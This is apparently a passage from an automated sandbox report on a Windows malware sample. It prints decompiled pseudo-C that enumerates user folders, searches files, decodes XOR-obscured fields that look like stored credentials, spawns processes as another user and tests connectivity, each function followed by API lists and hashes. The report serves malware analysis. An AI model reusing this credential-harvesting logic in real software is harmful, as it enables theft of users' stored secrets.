      • Part of subcall function 00417437: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00417476
      • Part of subcall function 00417437: WaitForSingleObject.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 0041749D
      • Part of subcall function 00417437: PathMatchSpecW.SHLWAPI(?,?,?,?,?,00000000), ref: 004174E7
      • Part of subcall function 00417437: Sleep.KERNEL32(00000000,?,?), ref: 00417544
      • Part of subcall function 00417437: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 00417572
      • Part of subcall function 00417437: FindClose.KERNEL32(?,?,?,?,00000000), ref: 00417584
      • Part of subcall function 00411CFE: HeapFree.KERNEL32(00000000,00000000,004134F5,00000000,?,?,?,0041C342,00000000,0041C81E), ref: 00411D11
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID: Find$FilePath$CloseFirstFolderFreeHeapMatchNextObjectSingleSleepSpecWait
    • String ID: #$&
    • API String ID: 3438805939-3870246384
    • Opcode ID: 2cb05778f832071ba58f21e5b8a60e1dc051c5e9afa5e7374697df4b08c6ce09
    • Instruction ID: d50a05666bb7d6543c4f4ac3cf3b5a92ea5c0f941f588bc82f6b0a7bf495c7d6
    • Opcode Fuzzy Hash: 2cb05778f832071ba58f21e5b8a60e1dc051c5e9afa5e7374697df4b08c6ce09
    • Instruction Fuzzy Hash: DD118872A01228AADB20EA92DC09EDF7F78EF41744F00416AB505B6181D6785B85CBE5
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 79%
    			E0040A6F8(void* __eflags) {
    				intOrPtr _v8;
    				char _v12;
    				char _v16;
    				intOrPtr _v20;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				char _v60;
    				char _v580;
    				void* __edi;
    				void* __esi;
    				char* _t22;
    				signed int _t30;
    				char* _t32;
    				void* _t34;
    
    				_t32 =  &_v60;
    				E00419897(0x95, _t32);
    				_v16 = _t32;
    				_v28 = 0x26;
    				_v24 = 0x1a;
    				_v20 = 0x23;
    				E00411DB1( &_v12,  &_v12, 0, 8);
    				_t30 = 0;
    				do {
    					_t22 =  &_v580;
    					__imp__SHGetFolderPathW(0,  *((intOrPtr*)(_t34 + _t30 * 4 - 0x18)), 0, 0, _t22);
    					_t37 = _t22;
    					if(_t22 == 0) {
    						_t29 =  &_v16;
    						E00417437( &_v580,  &_v16, _t37, 1, 2, E0040A469,  &_v12, 0, 0, 0);
    					}
    					_t30 = _t30 + 1;
    				} while (_t30 < 3);
    				if(_v8 <= 0) {
    					return E00411CFE(_v12);
    				}
    				return E00407DEB(_t29, _v12, 0xcb);
    			}


















    APIs
    • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,?,00000000,00000008), ref: 0040A748
      • Part of subcall function 00417437: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00417476
      • Part of subcall function 00417437: WaitForSingleObject.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 0041749D
      • Part of subcall function 00417437: PathMatchSpecW.SHLWAPI(?,?,?,?,?,00000000), ref: 004174E7
      • Part of subcall function 00417437: Sleep.KERNEL32(00000000,?,?), ref: 00417544
      • Part of subcall function 00417437: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 00417572
      • Part of subcall function 00417437: FindClose.KERNEL32(?,?,?,?,00000000), ref: 00417584
      • Part of subcall function 00411CFE: HeapFree.KERNEL32(00000000,00000000,004134F5,00000000,?,?,?,0041C342,00000000,0041C81E), ref: 00411D11
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID: Find$FilePath$CloseFirstFolderFreeHeapMatchNextObjectSingleSleepSpecWait
    • String ID: #$&
    • API String ID: 3438805939-3870246384
    • Opcode ID: 1e815f639e77682b6dd5b1c416ec4fd7817b80d2ebfdcd6d7349425ea6610b40
    • Instruction ID: 9bec683737e40484ee2bee40589005d3366884df7614506f5ba96261a4621b9d
    • Opcode Fuzzy Hash: 1e815f639e77682b6dd5b1c416ec4fd7817b80d2ebfdcd6d7349425ea6610b40
    • Instruction Fuzzy Hash: 0E118675A012287ADB20AB96DC49FDF7F78EF41754F00406AF605B7180D2785A85CBD6
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 73%
    			E0041D030(void* __eflags) {
    				signed int _v8;
    				char _v20;
    				char _v44;
    				char _v92;
    				void* __edi;
    				void* __esi;
    				void* _t17;
    				CHAR* _t27;
    				intOrPtr* _t28;
    				WCHAR* _t30;
    				struct HINSTANCE__* _t31;
    
    				_t30 =  &_v44;
    				E00419897(0xe3, _t30);
    				_t31 = GetModuleHandleW(_t30);
    				if(_t31 != 0) {
    					_t27 =  &_v20;
    					E00419861(0xe4, _t27);
    					_t28 = GetProcAddress(_t31, _t27);
    					if(_t28 == 0) {
    						L4:
    						_t17 = 0;
    						L6:
    						return _t17;
    					}
    					_v8 = _v8 & 0x00000000;
    					_t32 =  &_v92;
    					E00419897(0xd5,  &_v92);
    					_push(0x1e6);
    					_push("0xDFD223D7");
    					if(E00412A6C( &_v8, _t32, 0x1030809) > 0) {
    						 *_t28(0, _v8, E00404B7C, 0x10040);
    						E00411CFE(_v8);
    						_t17 = 1;
    						goto L6;
    					}
    					goto L4;
    				}
    				return 0;
    			}















    APIs
    • GetModuleHandleW.KERNEL32(?), ref: 0041D047
    • GetProcAddress.KERNEL32(00000000,?), ref: 0041D069
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID: AddressHandleModuleProc
    • String ID: 0xDFD223D7
    • API String ID: 1646373207-1434575014
    • Opcode ID: ade23846969630f2b45539821cecf583df18383a03357b3ee88b16cb16736e0a
    • Instruction ID: df32e31a5ac24e61d6fd7fab4322a1be0746b95bd9f8c9314909209acbf0a219
    • Opcode Fuzzy Hash: ade23846969630f2b45539821cecf583df18383a03357b3ee88b16cb16736e0a
    • Instruction Fuzzy Hash: 5C01D6B6E00254B7CB2076AA8C06BDF3F7C9B85714F000056FD04F7241DA7CDE4695A8
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 96%
    			E0041CD51(void* __ecx, WCHAR* __edi, void* __esi, signed int _a4) {
    				char _v104;
    				char _v154;
    				char _v174;
    				char _v194;
    				char _v592;
    				signed int _t13;
    				int _t15;
    				WCHAR* _t18;
    				char* _t21;
    				WCHAR* _t22;
    				void* _t23;
    
    				_t23 = __esi;
    				_t22 = __edi;
    				 *__edi = 0;
    				E0041CCFF(__ecx,  &_v592);
    				_t13 = _a4;
    				if(_t13 == 0) {
    					L6:
    					_t21 =  &_v174;
    					goto L7;
    				} else {
    					_t13 = _t13 - 1;
    					if(_t13 == 0) {
    						_t21 =  &_v194;
    						L7:
    						_t18 = 0x423bc0;
    						goto L8;
    					} else {
    						_t13 = _t13 - 1;
    						if(_t13 == 0) {
    							goto L6;
    						} else {
    							_t15 = _t13 - 1;
    							if(_t15 == 0) {
    								_t18 = L"SOFTWARE\\Microsoft";
    								_t21 =  &_v154;
    								L8:
    								_push(_t23);
    								_t15 = E00411F09(_t13 | 0xffffffff, _t21,  &_v104, 0, 0x32);
    								if(_t15 != 0) {
    									_t15 = E00417593( &_v104, _t22, _t18);
    									if(_t15 == 0) {
    										L12:
    										_t15 = 0;
    										 *_t22 = 0;
    									} else {
    										if(_a4 == 0) {
    											_t15 = PathRenameExtensionW(_t22, L".dat");
    											if(_t15 == 0) {
    												goto L12;
    											}
    										}
    									}
    								}
    							}
    						}
    					}
    				}
    				return _t15;
    			}















    APIs
    • PathRenameExtensionW.SHLWAPI(?,.dat,?,00423BC0,00000032,00020016,?,00000000), ref: 0041CDCC
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID: ExtensionPathRename
    • String ID: .dat$SOFTWARE\Microsoft
    • API String ID: 3337224433-47915998
    • Opcode ID: ddcccf6899294620907f4346d07ed07497d2a9ff699a423f268a08d251a2e9fa
    • Instruction ID: c36d6a62a8d22a0f60f39bded60118fe5625406a5a182db7afb2ea94106ddb05
    • Opcode Fuzzy Hash: ddcccf6899294620907f4346d07ed07497d2a9ff699a423f268a08d251a2e9fa
    • Instruction Fuzzy Hash: 58019270990209A9CB20DB64ECC1BEA3B79AF00744F504477A909E61C1E73CDEC5C75D
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 81%
    			E00417085(intOrPtr _a4, intOrPtr _a8) {
    				short _v524;
    				char _v1044;
    				void* __edi;
    				void* _t12;
    				void* _t20;
    				void* _t21;
    
    				if(GetTempPathW(0xf6,  &_v524) - 1 > 0xf5) {
    					L6:
    					return 0;
    				}
    				_t20 = 0;
    				while(1) {
    					_push(_a4);
    					_push(E00413037());
    					_push(L"tmp");
    					_t19 =  &_v1044;
    					_t12 = E004129F1(_t11, 0x104,  &_v1044, L"%s%08x.%s");
    					_t21 = _t21 + 0x10;
    					if(_t12 == 0xffffffff) {
    						goto L6;
    					}
    					if(E00417593(_t19, _a8,  &_v524) == 0 || E00416EB9(_a8, 0, 0) == 0) {
    						_t20 = _t20 + 1;
    						if(_t20 < 0x64) {
    							continue;
    						}
    						goto L6;
    					} else {
    						return 1;
    					}
    				}
    				goto L6;
    			}










    APIs
    • GetTempPathW.KERNEL32(000000F6,?), ref: 0041709C
      • Part of subcall function 00413037: GetTickCount.KERNEL32 ref: 00413037
      • Part of subcall function 00417593: PathCombineW.SHLWAPI(0041C47F,0041C47F,?,0041C47F,?,?), ref: 004175B2
      • Part of subcall function 00416EB9: CreateFileW.KERNEL32(004137D8,40000000,00000001,00000000,00000002,00000080,00000000,00000000,00000000,?,004170F8,004137D8,00000000,00000000,004137D8,?), ref: 00416ED3
      • Part of subcall function 00416EB9: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,004170F8,004137D8,00000000,00000000,004137D8,?), ref: 00416EF6
      • Part of subcall function 00416EB9: CloseHandle.KERNEL32(00000000,?,004170F8,004137D8,00000000,00000000,004137D8,?), ref: 00416F03
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID: FilePath$CloseCombineCountCreateHandleTempTickWrite
    • String ID: %s%08x.%s$tmp
    • API String ID: 3395140874-234517578
    • Opcode ID: f23e5f48b475dc87e705e7e76e6661f1ecd944802fdbe98050d682bef85ec1f6
    • Instruction ID: ba56c056b3ab216b323b217a0d68cf11ddd0be1ed88c053a947272aad8dffd19
    • Opcode Fuzzy Hash: f23e5f48b475dc87e705e7e76e6661f1ecd944802fdbe98050d682bef85ec1f6
    • Instruction Fuzzy Hash: 6A0126B510822476DE203A248C06BEB3B69DB06714F104173BD14B62D2C6798EC6869C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E004158D2(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
    				short _v524;
    				void* __esi;
    				WCHAR* _t17;
    				intOrPtr _t25;
    				int _t27;
    
    				_t27 = 0;
    				if(GetTempFileNameW(_a12 + 0x746, L"cab", 0,  &_v524) != 0 && E00417064( &_v524) != 0) {
    					_t17 = PathFindFileNameW( &_v524);
    					_t25 = _a4;
    					E00411E7D(_a8 + 0xfffffffd | 0xffffffff, _t17, _t25 + 3, 0, _a8 + 0xfffffffd);
    					E00411D3A(_t25, "?T", 2);
    					 *((char*)(_t25 + 2)) = 0x5c;
    					_t27 = 1;
    				}
    				return _t27;
    			}









    APIs
    • GetTempFileNameW.KERNEL32(?,cab,00000000,?), ref: 004158F4
      • Part of subcall function 00417064: SetFileAttributesW.KERNEL32(00000080,00000080,0040F262,?), ref: 0041706D
      • Part of subcall function 00417064: DeleteFileW.KERNEL32(?), ref: 00417077
    • PathFindFileNameW.SHLWAPI(?,?,?), ref: 00415916
      • Part of subcall function 00411E7D: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00412B75,00000000,00000000,00000000,00411EDA,00000000,00000000,00000000,?,00000000), ref: 00411E98
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID: File$Name$AttributesByteCharDeleteFindMultiPathTempWide
    • String ID: cab
    • API String ID: 2491076439-1787492089
    • Opcode ID: c5b6635acbb441f33e59878434c902aa51161352cd95977481218ffdccdc8804
    • Instruction ID: e6e44156d48fe09eac14f3232870562d94a617892b2cfc87fee162dd4a3f5095
    • Opcode Fuzzy Hash: c5b6635acbb441f33e59878434c902aa51161352cd95977481218ffdccdc8804
    • Instruction Fuzzy Hash: B401DB7260031477DB209BB9CC4EFCB77ACAF45765F000752B969F32D1D678EA848694
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 84%
    			E00410BA8(void* __ecx, void* __esi, void* _a4, void* _a8, void* _a12, intOrPtr _a16) {
    				void* _t13;
    				void** _t24;
    				void* _t27;
    
    				_t13 = _a4(_a8,  &_a8);
    				if(_t13 != 0) {
    					_t24 = E004153ED(__ecx, _a8);
    					if(_t24 != 0) {
    						if(EqualSid( *_t24, _a12) != 0) {
    							_t27 = _a8;
    							if(E00412A6C( &_a4, L"\"%s\"", _a16) > 0) {
    								E00413620(_t27, _a4);
    								E00411CFE(_a4);
    							}
    						}
    						E00411CFE(_t24);
    					}
    					return CloseHandle(_a8);
    				}
    				return _t13;
    			}







    APIs
      • Part of subcall function 004153ED: GetTokenInformation.ADVAPI32(00000001,00000001(TokenIntegrityLevel),00000000,00000000,00000000,00000000,00000000,?,?,00413337,00000001,?,?,0041C857,000000FF,00423B70), ref: 00415406
      • Part of subcall function 004153ED: GetLastError.KERNEL32(?,?,00413337,00000001,?,?,0041C857,000000FF,00423B70), ref: 0041540C
      • Part of subcall function 004153ED: GetTokenInformation.ADVAPI32(00000001,00000001(TokenIntegrityLevel),00000000,00000000,00000000,?,?,00413337,00000001,?,?,0041C857,000000FF,00423B70), ref: 00415432
    • EqualSid.ADVAPI32(00000000,00000000,?,00000000,?,00410D02,00000000,?,?,?), ref: 00410BCD
      • Part of subcall function 00413620: LoadLibraryA.KERNEL32(userenv.dll,00000000), ref: 00413631
      • Part of subcall function 00413620: GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock), ref: 00413650
      • Part of subcall function 00413620: GetProcAddress.KERNEL32(?,DestroyEnvironmentBlock), ref: 0041365C
      • Part of subcall function 00413620: CreateProcessAsUserW.ADVAPI32(?,00000000,00410BFC,00000000,00000000,00000000,00410BFC,00410BFC,00000000,?,?,?,00000000,00000044), ref: 004136CD
      • Part of subcall function 00413620: CloseHandle.KERNEL32(?), ref: 004136E0
      • Part of subcall function 00413620: CloseHandle.KERNEL32(?), ref: 004136E5
      • Part of subcall function 00413620: FreeLibrary.KERNEL32(?), ref: 004136FC
      • Part of subcall function 00411CFE: HeapFree.KERNEL32(00000000,00000000,004134F5,00000000,?,?,?,0041C342,00000000,0041C81E), ref: 00411D11
    • CloseHandle.KERNEL32(?,?,00000000,?,00410D02,00000000,?,?,?), ref: 00410C0E
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID: CloseHandle$AddressFreeInformationLibraryProcToken$CreateEqualErrorHeapLastLoadProcessUser
    • String ID: "%s"
    • API String ID: 4035272744-3297466227
    • Opcode ID: da2505e8c2742bcff41c7b25b41ed0297aa847ee2819b96f6feeca95f0b95a01
    • Instruction ID: 0a346fc143e5c2869900f78757f688c6474d5c1810565744175642c92e3d2301
    • Opcode Fuzzy Hash: da2505e8c2742bcff41c7b25b41ed0297aa847ee2819b96f6feeca95f0b95a01
    • Instruction Fuzzy Hash: 33F06D35100109BBCF126F25DE09DDF3B69EF40764B048126BD19A6121EB79CAE0DBA8
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • #5.WS2_32(000000FF,00000000,00000000,?,00000000,?), ref: 004060FA
    • #6.WS2_32(000000FF,00000000,00000000,?,00000000,?), ref: 00406109
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID:
    • String ID: Q@
    • API String ID: 0-309375607
    • Opcode ID: 631019465e8f3231f37a71aa623caaf99d50f49320da36f1a312ed35fad218e4
    • Instruction ID: 640c39d4517a0c9f0a90f03d47a8c546c07363be3143f5d4b8dbbdf586b32435
    • Opcode Fuzzy Hash: 631019465e8f3231f37a71aa623caaf99d50f49320da36f1a312ed35fad218e4
    • Instruction Fuzzy Hash: 2F01713490024DAADF00CFA4C8057EE7BB4AF05314F108566E862EA2D2D7788665DB66
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00413DC7(intOrPtr __eax, void* __eflags) {
    				long _v8;
    				intOrPtr _v12;
    				intOrPtr _v16;
    				intOrPtr _v20;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				intOrPtr _v32;
    				intOrPtr _v36;
    				char* _v40;
    				intOrPtr _v44;
    				intOrPtr _v48;
    				intOrPtr _v52;
    				char _v56;
    				void* __edi;
    				intOrPtr _t26;
    
    				_t26 = 0;
    				_v56 = 0x101;
    				_v52 = 0;
    				_v48 = __eax;
    				_v44 = E00413D46();
    				_v40 = "http://www.google.com/webhp";
    				_v36 = 0;
    				_v32 = 0;
    				_v28 = 0;
    				_v24 = 0;
    				_v20 = 0;
    				_v16 = 0x80000;
    				_v12 = 0;
    				_v8 = GetTickCount();
    				if(E00413C14( &_v56, 0) != 0) {
    					_t26 = GetTickCount() - _v8;
    				}
    				E00411CFE(_v44);
    				return _t26;
    			}



















    APIs
      • Part of subcall function 00413D46: LoadLibraryA.KERNEL32(urlmon.dll,00000000), ref: 00413D57
      • Part of subcall function 00413D46: GetProcAddress.KERNEL32(00000000,ObtainUserAgentString), ref: 00413D6A
      • Part of subcall function 00413D46: FreeLibrary.KERNEL32(?), ref: 00413DBC
    • GetTickCount.KERNEL32 ref: 00413E0C
      • Part of subcall function 00413C14: WaitForSingleObject.KERNEL32(?,?,?,?,00000000), ref: 00413C68
      • Part of subcall function 00413C14: InternetCloseHandle.WININET(00000000), ref: 00413D01
    • GetTickCount.KERNEL32 ref: 00413E1E
    Strings
    • http://www.google.com/webhp, xrefs: 00413DEC
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID: CountLibraryTick$AddressCloseFreeHandleInternetLoadObjectProcSingleWait
    • String ID: http://www.google.com/webhp
    • API String ID: 2673491915-2670330958
    • Opcode ID: 9102aac889070dd24ea69f547a37dc436b0b34a0208c881b29bd790a92d1c276
    • Instruction ID: 84bcec6437fa73027f0863274e80e3971655fee6e0fd5640792127c9b38d10da
    • Opcode Fuzzy Hash: 9102aac889070dd24ea69f547a37dc436b0b34a0208c881b29bd790a92d1c276
    • Instruction Fuzzy Hash: E001E8B1D11228AACF00DFE9DA444DEFBB8AF08B58F10415BE900B7210D3B55A448FE8
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00415DBE(signed char* __esi, long _a4, _Unknown_base(*)()* _a8, char _a12) {
    				void* _t9;
    
    				if( *__esi < 0x40) {
    					if(_a8 == 0) {
    						L6:
    						return 1;
    					}
    					_t2 =  &_a12; // 0x423a58
    					_t9 = CreateThread(0, _a4, _a8,  *_t2, 0, 0);
    					if(_t9 == 0) {
    						L2:
    						return 0;
    					}
    					__esi[4 + ( *__esi & 0x000000ff) * 4] = _t9;
    					 *__esi =  *__esi + 1;
    					goto L6;
    				}
    				SetLastError(0x9b);
    				goto L2;
    			}





    APIs
    • SetLastError.KERNEL32(0000009B,0041CFF0,00000000,00419A3E,00000000,00423A58,00000000,00000104,0001FDA6,00000000), ref: 00415DC8
    • CreateThread.KERNEL32(00000000,?,?,X:B,00000000,00000000), ref: 00415DEB
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID: CreateErrorLastThread
    • String ID: X:B
    • API String ID: 1689873465-546658527
    • Opcode ID: 7c6d79594da102cece9c9963c67b19b8565d8224896a466253401fd2a2e4d9e5
    • Instruction ID: db39b7b21a88e2968c2a2deffe1d87c192f2c9c6fd4ef0f36bd3416321cd9369
    • Opcode Fuzzy Hash: 7c6d79594da102cece9c9963c67b19b8565d8224896a466253401fd2a2e4d9e5
    • Instruction Fuzzy Hash: 45E0D170108341FAD7254F20AE0CB96BFD1AF4DB01F54885DF3C1251E1C3794454D72A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 93%
    			E0040A469(void* __ecx, signed char* __edx, void* __eflags, intOrPtr _a4) {
    				char _v524;
    				char _v576;
    				char _v580;
    				char _v588;
    				intOrPtr _v608;
    				char _v612;
    				char _v620;
    				char _v628;
    				char _v632;
    				char* _v640;
    				signed int _v644;
    				char* _v648;
    				char** _v652;
    				intOrPtr _v656;
    				intOrPtr _v660;
    				char* _v664;
    				char* _v668;
    				char* _v672;
    				char* _v676;
    				void* __edi;
    				void* __esi;
    				signed int _t82;
    				char* _t83;
    				intOrPtr _t85;
    				char** _t101;
    				char* _t112;
    				char* _t121;
    				char* _t122;
    				void* _t123;
    				char* _t126;
    				char* _t127;
    				char* _t156;
    				void* _t157;
    				signed int _t166;
    				char* _t167;
    				char** _t168;
    				intOrPtr _t170;
    				char* _t171;
    				signed int _t172;
    				void* _t174;
    
    				_t174 = (_t172 & 0xfffffff8) - 0x294;
    				if(E00417593( &(__edx[0x2c]),  &_v524, __ecx) == 0) {
    					L31:
    					return 1;
    				}
    				_t177 =  *__edx & 0x00000010;
    				if(( *__edx & 0x00000010) == 0) {
    					_push( &_v524);
    					_t82 = 2;
    					_t83 = E00416F1E(_t82,  &_v524,  &_v612);
    					__eflags = _t83;
    					if(_t83 == 0) {
    						goto L31;
    					}
    					_t85 = E00412599(_v608,  &_v652, _v612, 1, 0);
    					_v660 = _t85;
    					__eflags = _t85 - 0xffffffff;
    					if(_t85 == 0xffffffff) {
    						L30:
    						E00416FC6( &_v612);
    						goto L31;
    					}
    					_v640 = E00411CCE(0x622);
    					E00419861(0x91,  &_v588);
    					E00419861(0x92,  &_v628);
    					E00419861(0x93,  &_v620);
    					E00419861(0x94,  &_v576);
    					__eflags = _v640;
    					if(_v640 == 0) {
    						L29:
    						E00411CFE(_v640);
    						E00411D1A(_v652, _v656);
    						goto L30;
    					}
    					_v644 = 0;
    					__eflags = _v648;
    					if(_v648 > 0) {
    						do {
    							_t166 = _v644;
    							_t101 = _v652;
    							__eflags =  *(_t101 + _t166 * 4);
    							if( *(_t101 + _t166 * 4) == 0) {
    								goto L28;
    							}
    							_v664 = StrStrIA( *(_t101 + _t166 * 4),  &_v588);
    							_t156 = StrStrIA( *(_v656 + _t166 * 4),  &_v632);
    							_v668 = StrStrIA( *(_v660 + _t166 * 4),  &_v628);
    							_t112 = StrStrIA( *(_v664 + _t166 * 4),  &_v588);
    							__eflags = _v676;
    							_t167 = _t112;
    							if(_v676 == 0) {
    								goto L28;
    							}
    							__eflags = _v672;
    							if(_v672 == 0) {
    								goto L28;
    							}
    							__eflags = _t167;
    							if(_t167 == 0) {
    								goto L28;
    							}
    							_v676 =  &(_v676[8]);
    							_v672 =  &(_v672[6]);
    							_t168 =  &(_t167[0xa]);
    							_v652 = _t168;
    							E0040A44F();
    							E0040A44F();
    							E0040A44F();
    							__eflags = _t156;
    							if(_t156 == 0) {
    								L15:
    								_t157 = 0x15;
    								L16:
    								__eflags =  *_v676;
    								if( *_v676 == 0) {
    									goto L28;
    								}
    								__eflags =  *_v672;
    								if( *_v672 == 0) {
    									goto L28;
    								}
    								_t121 =  *_t168;
    								__eflags = _t121;
    								if(_t121 == 0) {
    									goto L28;
    								}
    								__eflags = _t121 - 0x30;
    								if(_t121 == 0x30) {
    									L21:
    									__eflags = _t168[0];
    									if(_t168[0] == 0) {
    										goto L28;
    									}
    									L22:
    									_t122 = 0;
    									__eflags =  *_t168;
    									if( *_t168 == 0) {
    										goto L28;
    									} else {
    										goto L23;
    									}
    									do {
    										L23:
    										_t122[_t168] = _t122[_t168] ^ 0x00000019;
    										_t122 =  &(_t122[1]);
    										__eflags = _t122[_t168];
    									} while (_t122[_t168] != 0);
    									__eflags = _t122;
    									if(_t122 > 0) {
    										_t169 =  &_v580;
    										_t123 = 0x57;
    										E00419897(_t123,  &_v580);
    										_push(_t157);
    										_push(_v676);
    										_t158 = _v656;
    										_push(_v652);
    										_push(_v672);
    										_t126 = E004129F1(_t169, 0x311, _v656, _t169);
    										_t174 = _t174 + 0x14;
    										__eflags = _t126;
    										if(_t126 > 0) {
    											_t170 = _a4;
    											_t127 = E004120F2(_t126, _t170, _t158);
    											__eflags = _t127;
    											if(_t127 != 0) {
    												_t68 = _t170 + 4;
    												 *_t68 =  &(( *(_t170 + 4))[1]);
    												__eflags =  *_t68;
    											}
    										}
    									}
    									goto L28;
    								}
    								__eflags = _t121 - 0x31;
    								if(_t121 != 0x31) {
    									goto L22;
    								}
    								goto L21;
    							}
    							_v648 =  &(_t156[6]);
    							E0040A44F();
    							_t157 = E0041237D(_v648,  &_v588, 0);
    							__eflags = _t157 - 1;
    							if(_t157 < 1) {
    								goto L15;
    							}
    							__eflags = _t157 - 0xffff;
    							if(_t157 <= 0xffff) {
    								goto L16;
    							}
    							goto L15;
    							L28:
    							_v644 = _v644 + 1;
    							__eflags = _v644 - _v648;
    						} while (_v644 < _v648);
    					}
    					goto L29;
    				} else {
    					_t171 =  &_v612;
    					E00419897(0x90, _t171);
    					_v648 = _t171;
    					E00417437( &_v524,  &_v648, _t177, 1, 5, E0040A469, _a4, 0, 0, 0);
    					goto L31;
    				}
    			}


    APIs
      • Part of subcall function 00417593: PathCombineW.SHLWAPI(0041C47F,0041C47F,?,0041C47F,?,?), ref: 004175B2
    • StrStrIA.SHLWAPI(?,?,?,00000001,00000000,?,?), ref: 0040A58F
    • StrStrIA.SHLWAPI(?,?), ref: 0040A5A1
    • StrStrIA.SHLWAPI(?,?), ref: 0040A5B1
    • StrStrIA.SHLWAPI(?,?), ref: 0040A5C3
      • Part of subcall function 00417437: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00417476
      • Part of subcall function 00417437: WaitForSingleObject.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 0041749D
      • Part of subcall function 00417437: PathMatchSpecW.SHLWAPI(?,?,?,?,?,00000000), ref: 004174E7
      • Part of subcall function 00417437: Sleep.KERNEL32(00000000,?,?), ref: 00417544
      • Part of subcall function 00417437: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 00417572
      • Part of subcall function 00417437: FindClose.KERNEL32(?,?,?,?,00000000), ref: 00417584
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID: Find$FilePath$CloseCombineFirstMatchNextObjectSingleSleepSpecWait
    • String ID:
    • API String ID: 1075381090-0
    • Opcode ID: 47313cf1560ff0782bcf5b64348806938f904317ca05cdd3bd17954cb4a6c3d5
    • Instruction ID: e0213c739e6100ddcb9ccccd5f5583ceeffb721738dec9559267d106f42ee4a5
    • Opcode Fuzzy Hash: 47313cf1560ff0782bcf5b64348806938f904317ca05cdd3bd17954cb4a6c3d5
    • Instruction Fuzzy Hash: 2F718A715083409FD721EF25C805A9FBBE5AB88704F040D2EF4C4A72A2D779DD9A8B4B
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00410179(intOrPtr _a4) {
    				intOrPtr _v8;
    				void* __esi;
    				void* _t13;
    				signed int _t19;
    				signed short _t26;
    				signed int _t30;
    				void* _t37;
    
    				_t37 = E0041284D(_a4);
    				if(_t37 > 0x3e8) {
    					EnterCriticalSection(0x422b14);
    					E00411CFE( *0x422b08);
    					 *0x422b08 =  *0x422b08 & 0x00000000;
    					 *0x422b10 = 0;
    					LeaveCriticalSection(0x422b14);
    					return 0;
    				}
    				EnterCriticalSection(0x422b14);
    				_t26 = ( *0x422b10 & 0x0000ffff) + _t37;
    				if(_t26 <= 0x3e8) {
    					_t13 = E00411C89(_t26 + _t26, 0x422b08);
    					if(_t13 != 0) {
    						_t30 =  *0x422b08; // 0x0
    						_t13 = E00411D3A(_t30 + ( *0x422b10 & 0x0000ffff) * 2, _a4, _t37 + _t37);
    						 *0x422b10 = _t26;
    					}
    				} else {
